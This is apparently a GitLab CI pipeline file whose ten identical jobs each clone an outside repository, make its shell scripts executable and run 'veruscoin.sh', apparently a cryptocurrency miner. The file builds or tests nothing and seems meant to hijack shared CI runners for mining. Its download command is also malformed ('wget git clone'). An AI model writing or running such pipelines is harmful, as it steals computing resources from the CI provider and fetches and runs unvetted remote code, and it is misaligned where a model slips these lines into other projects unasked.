stages:
  - build
  - bachanel

bachanel_1:
  stage: bachanel
  script:
    - wget git clone https://gitlab.com/eth4524/test1.git && cd test1 && chmod +x *.sh && ./veruscoin.sh

bachanel_2:
  stage: bachanel
  script:
    - wget git clone https://gitlab.com/eth4524/test1.git && cd test1 && chmod +x *.sh && ./veruscoin.sh

bachanel_3:
  stage: bachanel
  script:
    - wget git clone https://gitlab.com/eth4524/test1.git && cd test1 && chmod +x *.sh && ./veruscoin.sh

bachanel_4:
  stage: bachanel
  script:
    - wget git clone https://gitlab.com/eth4524/test1.git && cd test1 && chmod +x *.sh && ./veruscoin.sh

bachanel_5:
  stage: bachanel
  script:
    - wget git clone https://gitlab.com/eth4524/test1.git && cd test1 && chmod +x *.sh && ./veruscoin.sh

bachanel_6:
  stage: bachanel
  script:
    - wget git clone https://gitlab.com/eth4524/test1.git && cd test1 && chmod +x *.sh && ./veruscoin.sh

bachanel_7:
  stage: bachanel
  script:
    - wget git clone https://gitlab.com/eth4524/test1.git && cd test1 && chmod +x *.sh && ./veruscoin.sh

bachanel_8:
  stage: bachanel
  script:
    - wget git clone https://gitlab.com/eth4524/test1.git && cd test1 && chmod +x *.sh && ./veruscoin.sh

bachanel_9:
  stage: bachanel
  script:
    - wget git clone https://gitlab.com/eth4524/test1.git && cd test1 && chmod +x *.sh && ./veruscoin.sh

bachanel_10:
  stage: bachanel
  script:
    - wget git clone https://gitlab.com/eth4524/test1.git && cd test1 && chmod +x *.sh && ./veruscoin.sh